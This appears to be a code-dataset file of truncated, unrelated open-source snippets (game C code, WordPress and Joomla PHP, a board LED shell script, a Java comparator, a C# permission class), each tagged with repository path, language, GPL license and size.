C#
gpl-2.0
722
/* Copyright (C) 1997-2001 Id Software, Inc. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in th...
decino/Infighter
src/monsters/quake1/m_demon.c
C
gpl-2.0
8,074
<?php /** * Header Template * * Please do not edit this file. This file is part of the Cyber Chimps Framework and all modifications * should be made in a child theme. * * @category CyberChimps Framework * @package Framework * @since 1.0 * @author CyberChimps * @license http://www.opensource.org/license...
campusIdOpenRov/campusrovblog
wp-content/themes/eclipse/header.php
PHP
gpl-2.0
3,888
<?php /** * Created by PhpStorm. * User: ROGER * Date: 16.03.14 * Time: 04:08 */ add_action('admin_notices', 'my_admin_notice'); function my_admin_notice() { $set_errors = get_settings_errors(); if (!isset($_SESSION['page_for_posts']) || !isset($_SESSION['page_on_front'])) { $_SESSION['page_for_posts'] = ...
HRoger/angularpresstheme
library/inc/angular/admin/reading-settings.php
PHP
gpl-2.0
1,450
/* -*- mode: c; tab-width: 4; indent-tabs-mode: n; c-basic-offset: 4 -*- * * $Id: nb_kernel301_ia32_sse.h,v 1.1 2004/12/26 19:28:54 lindahl Exp $ * * This file is part of Gromacs Copyright (c) 1991-2004 * David van der Spoel, Erik Lindahl, University of Groningen. * * This program is free software; you ...
tectronics/force-distribution-analysis.gromacs-4-0-5
src/gmxlib/nonbonded/nb_kernel_ia32_sse/nb_kernel301_ia32_sse.h
C
gpl-2.0
3,484
<?php namespace Shippingpickup; use Sumo; use App; class ModelSetup extends App\Model { public function install() { Sumo\Database::query(" CREATE TABLE IF NOT EXISTS PREFIX_app_shippingpickup ( `setting_id` int(11) NOT NULL AUTO_INCREMENT, `store_id` int(11) ...
wardvanderput/SumoStore
upload/apps/shippingpickup/model/setup.php
PHP
gpl-2.0
975
<?php /** * @copyright Ilch 2.0 * @package ilch */ return [ 'menuRules' => 'Rules', 'paragraph' => 'Paragraph', 'title' => 'Title', 'text' => 'Text', 'noRules' => 'No rules available', ];
Saarlonz/Ilch-2.0
application/modules/rule/translations/en.php
PHP
gpl-2.0
212
#!/bin/sh led_path=none for leds in /sys/class/leds/*; do # LED A on NGW100 or LED B1 on STK1000 if [ "${leds}" = "/sys/class/leds/a" -o "${leds}" = "/sys/class/leds/b1:blue" ]; then led_path=${leds} led_brightness=`cat ${led_path}/brightness` led_trigger=`cat ${led_path}/trigger | cut -d ' ' -f1` break fi...
egtvedt/Buildroot-for-AVR32
package/avr32-web-start/files/cgi-bin/gpio-trigger.sh
Shell
gpl-2.0
565
<?php /* * Add-on Name: Advanced Image * Add-on URI: http://highgradelab.com/plugins/highgrade-extender/ * Since: 1.0 * Author: Eugen Petcu */ if(!class_exists('HGR_VC_ADVIMAGE')) { class HGR_VC_ADVIMAGE { function __construct() { add_action('admin_init', array($this, 'hgr_advimage_init')); } /* Visual...
domowit/BOOTSTRAP_V2
wp-content/plugins/hgr_vc_extender/elements/hgr_xtnd_advanced_image.php
PHP
gpl-2.0
2,596
package it.unimarconi.utils; import it.unimarconi.beans.Job; import java.util.Comparator; public class JobComparator implements Comparator<Job> { public int compare(Job a, Job b) { return a.compareTo(b); } }
Kalimaha/MLS_Barbaglia
src/main/java/it/unimarconi/utils/JobComparator.java
Java
gpl-2.0
228
<?php /** Latvian (latviešu) * * See MessagesQqq.php for message documentation incl. usage of parameters * To improve a translation please visit http://translatewiki.net * * @ingroup Language * @file * * @author Admresdeserv. * @author Dark Eagle * @author FnTmLV * @author Geimeris * @author Gleb Borisov *...
kimberli/5327A-notebook
languages/messages/MessagesLv.php
PHP
gpl-2.0
194,685
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=jseg_exp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:20:07 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <head> <meta charset="ut...
platinhom/ManualHom
Coding/W3School/W3CN/www.w3school.com.cn/tiy/t7683.html
HTML
gpl-2.0
2,601
<?php namespace qtismtest\common\datatypes; use qtism\common\datatypes\Utils; use qtismtest\QtiSmTestCase; /** * Class DatatypeUtilsTest */ class DatatypeUtilsTest extends QtiSmTestCase { /** * @dataProvider isQtiIntegerValidProvider * @param int $value */ public function testIsQtiIntegerVal...
oat-sa/qti-sdk
test/qtismtest/common/datatypes/DatatypeUtilsTest.php
PHP
gpl-2.0
1,146
/* * Automatically generated C config: don't edit */ #undef __CONFIG_NAT__ /* * Base Features */ #define __CONFIG_RC__ 1 #define __CONFIG_NVRAM__ 1 #define __CONFIG_NVRAM_UTILITY__ 1 #define __CONFIG_SHARED__ 1 #define __CONFIG_LIBBCM__ 1 #define __CONFIG_BUSYBOX__ 1 #define __CONFIG_BUSYBOX_CONFIG__ "router" #def...
hajuuk/R7000
src/router/shared/bcmconfig.h
C
gpl-2.0
2,740
<?php /** * @version $Id: move.php 1812 2013-01-14 18:45:06Z lefteris.kavadas $ * @package K2 * @author JoomlaWorks http://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved. * @license GNU/GPL license: http://www.gnu.org/copyleft/gpl.html */ // no direct access d...
the-dani/kunnandidagen
administrator/components/com_k2/views/users/tmpl/move.php
PHP
gpl-2.0
1,323
// // System.Security.Permissions.DataProtectionPermission class // // Author: // Sebastien Pouliot <sebastien@ximian.com> // // Copyright (C) 2004-2005 Novell, Inc (http://www.novell.com) // // Permission is hereby granted, free of charge, to any person obtaining // a copy of this software and associated documentatio...
hardvain/mono-compiler
class/System.Security/System.Security.Permissions/DataProtectionPermission.cs
C#
gpl-2.0
4,520
<?php class wpmlHistoriesList extends wpMailPlugin { var $model = 'HistoriesList'; var $controller = 'historieslists'; var $table = ''; var $errors = array(); var $data = array(); var $fields = array( 'id' => "INT(11) NOT NULL AUTO_INCREMENT", 'history_id' => "INT(11) NOT NULL DEFAULT '...
GaMaker/web-wordpress
wp-content/plugins/newsletters-lite/models/histories_list.php
PHP
gpl-2.0
2,033